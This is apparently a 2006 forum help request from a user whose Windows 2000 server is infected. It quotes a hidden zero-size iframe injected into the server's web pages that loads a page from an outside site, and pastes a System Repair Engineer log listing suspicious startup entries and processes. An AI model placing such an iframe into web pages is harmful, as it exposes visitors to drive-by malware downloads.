sys767767 - 2006-12-26 9:10:00
Web pages injected with:
<iframe src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></iframe>
[CODE]
2006-12-26,08:42:34
System Repair Engineer 2.3.13.690
Smallfrogs (http://www.KZTechs.com)
Windows 2000 Professional Service Pack 4 (Build 2195)
- 管理权限用户 - 完整功能
以下内容被选中:
所有的启动项目(包括注册表、启动文件夹、服务等)
浏览器加载项
正在运行的进程(包括进程模块信息)
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><ctfmon.exe> [Microsoft Corporation]
<svc><C:\DOCUME~1\yinhe456\LOCALS~1\Temp\qiang1.exe> [Microsoft Corporation]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><C:\WINNT\rundl132.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<Synchronization Manager><mobsync.exe /logon> [(Verified)Microsoft Corporation]
<ESMgr><C:\Program Files\Cesoft\Excel Server\ESMgr.exe> [cesoft]
<runeip><C:\Program Files\Rising\AntiSpyware\runiep.exe> [Beijing Rising Technology Co., Ltd.]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Verified)Microsoft Corporation]
<Userinit><C:\WINNT\system32\userinit.exe,devgt.exe> [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{C54C4AFB-8A2A-6C1E-BA4D-C20F02941223}><C:\WINNT\system32\SVCHOST.dll> [N/A]
[HKEY_CURRENT_USER\Control Panel\Desktop]
<SCRNSAVE.EXE><C:\WINNT\system32\ssbezier.scr> [(Verified)Microsoft Corporation]
==================================
启动文件夹
[服务管理器]
<C:\Documents and Settings\All Users\「开始」菜单\程序\启动\服务管理器.lnk --> C:\PROGRA~1\MICROS~4\80\Tools\Binn\sqlmangr.exe [Microsoft Corporation]><N>
[启动IE防漏墙 (2)]
<C:\Documents and Settings\yinhe456\「开始」菜单\程序\启动\启动IE防漏墙 (2).lnk --> C:\PROGRA~1\Rising\ANTISP~1\runiep.exe [Beijing Rising Technology Co., Ltd.]><N>
==================================
服务
[Logical Disk Manager Administrative Service / dmadmin][Stopped/Manual Start]
<C:\WINNT\System32\dmadmin.exe /com><VERITAS Software Corp.>
[IMA_Server / IMA_Server][Running/Auto Start]
<d:\MYOA\IMA\IMAServer.exe><N/A>
[MeChat / MeChat][Running/Auto Start]
<d:\MYOA\MeChat\MeChat.exe><N/A>
[MSSQLSERVER / MSSQLSERVER][Running/Auto Start]
<C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe -sMSSQLSERVER><Microsoft Corporation>
[MSSQLServerADHelper / MSSQLServerADHelper][Stopped/Manual Start]
<C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe><>
[MySQL / MySQL][Running/Auto Start]
<D:\MYOA\mysql\bin\mysqld-nt.exe MySQL><N/A>
[Office_Anywhere / Office_Anywhere][Running/Auto Start]
<"d:\MYOA\bin\apache.exe" -k runservice><Apache Software Foundation>
[SQLSERVERAGENT / SQLSERVERAGENT][Running/Auto Start]
<C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.EXE -i MSSQLSERVER><Microsoft Corporation>
[Windows DHCP Service / WinDHCPsvc][Stopped/Auto Start]
<C:\WINNT\system32\rundll32.exe windhcp.ocx,start><Microsoft Corporation>
[WinXP DHCP Service / WinXPDHCPsvc][Stopped/Auto Start]
<C:\WINNT\system32\rundll32.exe xpdhcp.dll,start><Microsoft Corporation>
==================================
驱动程序
[atirage3 / atirage3][Running/Manual Start]
<System32\DRIVERS\atimpab.sys><ATI Technologies Inc.>
[dmboot / dmboot][Stopped/Disabled]
<System32\drivers\dmboot.sys><VERITAS Software Corp.>
[Logical Disk Manager Driver / dmio][Running/Boot Start]
<\SystemRoot\System32\drivers\dmio.sys><VERITAS Software Corp.>
[dmload / dmload][Running/Boot Start]
<\SystemRoot\System32\drivers\dmload.sys><VERITAS Software Corp.>
[Intel(R) PRO/1000 Adapter Driver / E1000][Running/Manual Start]
<System32\DRIVERS\e1000nt5.sys><Intel Corporation>
[Intel(R) PRO Adapter Driver / E100B][Running/Manual Start]
<System32\DRIVERS\e100bnt5.sys><Intel Corporation>
[HOSTNT / HOSTNT][Running/Auto Start]
<\??\C:\WINNT\system32\drivers\hostnt.sys><N/A>
[MHDRV / MHDRV][Running/Auto Start]
<\??\C:\WINNT\system32\drivers\mhdrv.sys><SafeNet China Ltd.>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<System32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[RCMHDOG / RCMHDOG][Running/Auto Start]
<\??\C:\WINNT\system32\drivers\rcmhdog.sys><SafeNet China Ltd.>
[SafeNet MicroDog USB Device Driver / UsbC][Running/Manual Start]
<System32\Drivers\rcusbwdm.sys><SafeNet China Ltd.>
[squell / squell][Running/Manual Start]
<2 - 系统找不到指定的文件。
><N/A>
[Netgroup Packet Filter / NPF][Running/Manual Start]
<system32\DRIVERS\npf.sys><CACE Technologies>
==================================
浏览器加载项
[@shdoclc.dll,-866]
{c95fe080-8f5d-11d2-a20b-00aa003c157a} <, N/A>
[访问瑞星网站]
{FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} <http://www.rising.com.cn/?u=RSTB, N/A>
[访问卡卡社区]
{FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} <http://www.ikaka.com/?u=RSTB, N/A>
[电台(&R)]
{8E718888-423F-11D2-876E-00A0C9082467} <C:\WINNT\system32\msdxm.ocx, Microsoft Corporation>
[卡卡上网安全助手]
{DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINNT\system32\kakatool.dll, Beijing Rising Technology Co., Ltd.>
[导出到 Microsoft Excel(&x)]
<res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000, N/A>
==================================
正在运行的进程
[PID: 140][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.00.2195.6601]
[PID: 164][\??\C:\WINNT\system32\csrss.exe] [Microsoft Corporation, 5.00.2195.6601]
[PID: 160][\??\C:\WINNT\system32\winlogon.exe] [Microsoft Corporation, 5.00.2195.6898]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[PID: 212][C:\WINNT\system32\services.exe] [Microsoft Corporation, 5.00.2195.6700]
[C:\WINNT\system32\dmserver.dll] [VERITAS Software Corp., 2195.6605.297.3]
[PID: 224][C:\WINNT\system32\lsass.exe] [Microsoft Corporation, 5.00.2195.6902]
[PID: 400][C:\WINNT\system32\svchost.exe] [Microsoft Corporation, 5.00.2134.1]
[PID: 424][C:\WINNT\system32\spoolsv.exe] [Microsoft Corporation, 5.00.2195.6659]
[PID: 456][C:\WINNT\System32\svchost.exe] [Microsoft Corporation, 5.00.2134.1]
[PID: 484][d:\MYOA\MeChat\MeChat.exe] [N/A, N/A]
[PID: 548][C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\OPENDS60.DLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\UMS.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLSORT.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlevn70.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SSNETLIB.dll] [Microsoft Corporation, 2000.080.0766.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SSNMPN70.dll] [Microsoft Corporation, 2000.080.0534.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SSmsLPCn.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpsqlbot.dll] [Microsoft Corporation, 2000.080.0760.00]
[PID: 556][D:\MYOA\mysql\bin\mysqld-nt.exe] [N/A, N/A]
sys767767 - 2006-12-26 9:12:00
[PID: 584][d:\MYOA\bin\apache.exe] [Apache Software Foundation, 2.0.53]
[d:\MYOA\bin\libapr.dll] [Apache Software Foundation, 0.0.0.0]
[d:\MYOA\bin\libaprutil.dll] [Apache Software Foundation, 0.0.0.0]
[d:\MYOA\bin\libapriconv.dll] [Apache Software Foundation, 0.0.0.0]
[d:\MYOA\bin\libhttpd.dll] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_access.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_actions.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_alias.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_asis.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_auth.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_autoindex.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_dir.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_env.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_include.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_log_config.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_mime.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_negotiation.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_setenvif.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_imap.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_cgi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_isapi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_file_cache.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\bin\sapi\php4apache2.dll] [N/A, N/A]
[d:\MYOA\bin\php4ts.dll] [The PHP Group, 4.3.10.10]
[D:\MYOA\bin\sapi\mod_jk2.dll] [N/A, N/A]
[D:\MYOA\bin\mmcache.dll] [N/A, N/A]
[D:\MYOA\bin\ZendOptimizer.dll] [N/A, N/A]
[d:\MYOA\bin\php_gd2.dll] [N/A, N/A]
[PID: 652][C:\WINNT\system32\regsvc.exe] [Microsoft Corporation, 5.00.2195.6701]
[PID: 664][C:\WINNT\system32\MSTask.exe] [Microsoft Corporation, 4.71.2195.6704]
[PID: 736][C:\WINNT\System32\WBEM\WinMgmt.exe] [Microsoft Corporation, 1.50.1085.0100]
[PID: 760][C:\WINNT\system32\svchost.exe] [Microsoft Corporation, 5.00.2134.1]
[PID: 776][d:\MYOA\IMA\IMAServer.exe] [N/A, N/A]
[d:\MYOA\IMA\crypt.dll] [N/A, N/A]
[d:\MYOA\IMA\CC3260MT.DLL] [Borland Corporation, 0.0.0.0 (informal build)]
[d:\MYOA\IMA\libmysql.dll] [N/A, N/A]
[PID: 916][C:\WINNT\Explorer.EXE] [Microsoft Corporation, 5.00.3700.6690]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\WinRAR\rarext.dll] [N/A, N/A]
[C:\WINNT\system32\msimtf.dll] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\xpdhcp.dll] [N/A, N/A]
[PID: 944][C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.EXE] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLRESLD.dll] [Microsoft Corporation, 2000.080.0382.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLSVC.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\W95SCM.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SEMMAP.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\SQLSVC.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\SEMMAP.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlagent.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\SQLAGENT.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlcmdss.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlcmdss.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlrepss.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlrepss.RLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlatxss.DLL] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\Binn\Resources\2052\sqlatxss.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\AXSCPHST.DLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\Resources\2052\AXSCPHST.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\WINNT\system32\DBmsLPCn.dll] [Microsoft Corporation, 2000.080.0760.00]
[PID: 992][D:\MYOA\bin\apache.exe] [Apache Software Foundation, 2.0.53]
[D:\MYOA\bin\libapr.dll] [Apache Software Foundation, 0.0.0.0]
[D:\MYOA\bin\libaprutil.dll] [Apache Software Foundation, 0.0.0.0]
[D:\MYOA\bin\libapriconv.dll] [Apache Software Foundation, 0.0.0.0]
[D:\MYOA\bin\libhttpd.dll] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_access.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_actions.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_alias.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_asis.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_auth.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_autoindex.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_dir.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_env.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_include.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_log_config.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_mime.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_negotiation.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_setenvif.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_imap.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_cgi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_isapi.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\modules\mod_file_cache.so] [Apache Software Foundation, 2.0.53]
[D:\MYOA\bin\sapi\php4apache2.dll] [N/A, N/A]
[D:\MYOA\bin\php4ts.dll] [The PHP Group, 4.3.10.10]
[D:\MYOA\bin\sapi\mod_jk2.dll] [N/A, N/A]
[D:\MYOA\bin\mmcache.dll] [N/A, N/A]
[D:\MYOA\bin\ZendOptimizer.dll] [N/A, N/A]
[D:\MYOA\bin\php_gd2.dll] [N/A, N/A]
sys767767 - 2006-12-26 9:13:00
[PID: 2092][C:\Program Files\Cesoft\Excel Server\ESMgr.exe] [cesoft, 1.00]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Cesoft\Excel Server\ESSa.dll] [cesoft, 1.00]
[C:\WINNT\system32\DBmsLPCn.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\WINNT\system32\capicom.dll] [Microsoft Corporation, 2, 0, 0, 3]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2140][C:\WINNT\system32\ctfmon.exe] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\MSUTB.dll] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\mui\fallback\0804\msutb.dll.mui] [Microsoft Corporation, 1.00.2409.7 built by: Lab06_N]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2160][C:\WINNT\system32\conime.exe] [Microsoft Corporation, 5.00.2195.6655]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[PID: 2180][C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\W95SCM.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\SQLSVC.dll] [Microsoft Corporation, 2000.080.0760.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\SQLRESLD.dll] [Microsoft Corporation, 2000.080.0382.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\Resources\2052\SQLSVC.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\Binn\Resources\2052\sqlmangr.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2100][D:\MYOA\bin\Monitor.exe] [Software Foundation, 2.0.45]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2172][C:\Program Files\Rising\AntiSpyware\runiep.exe] [Beijing Rising Technology Co., Ltd., 1, 0, 1, 3]
[C:\Program Files\Rising\AntiSpyware\iep_ctrl.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[PID: 2520][C:\WINNT\system32\wuauclt.exe] [Microsoft Corporation, 5.4.3630.2554 built by: lab04_n]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\PYJJU.IME] [北京六合源软件技术有限公司, 2, 2, 0, 4]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 748][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2600.0000]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\kakatool.dll] [Beijing Rising Technology Co., Ltd., 2, 0, 2, 6]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\Dll.dll] [N/A, N/A]
[PID: 812][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2600.0000]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\system32\kakatool.dll] [Beijing Rising Technology Co., Ltd., 2, 0, 2, 6]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2588][C:\WINNT\Logo1_.exe] [, 1.0.0.0]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2608][C:\WINNT\system32\devgt.exe] [N/A, N/A]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 892][C:\Documents and Settings\yinhe456\My Documents\sreng2\SREng.EXE] [Smallfrogs Studio, 2.3.13.690]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\MSCTF.dll] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\WINNT\mui\fallback\0804\msctf.dll.mui] [Microsoft Corporation, 1.00.2409.8 built by: Lab06_N]
[C:\Program Files\Rising\AntiSpyware\ieprot.dll] [Beijing Rising Technology Co., Ltd., 1, 0, 0, 7]
[PID: 2796][C:\WINNT\system32\conime.exe] [Microsoft Corporation, 5.00.2195.6655]
[C:\WINNT\system32\windhcp.ocx] [N/A, N/A]
[C:\WINNT\system32\xpdhcp.dll] [N/A, N/A]
==================================
文件关联
.TXT OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM OK. ["C:\WINNT\hh.exe" %1]
.HLP OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS Error. [C:\WINNT\system32\WScript.exe "%1" %*]
.JS Error. [C:\WINNT\system32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]
==================================
Winsock 提供者
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS 文件
127.0.0.1 localhost
==================================
API HOOK
N/A
==================================
[/CODE]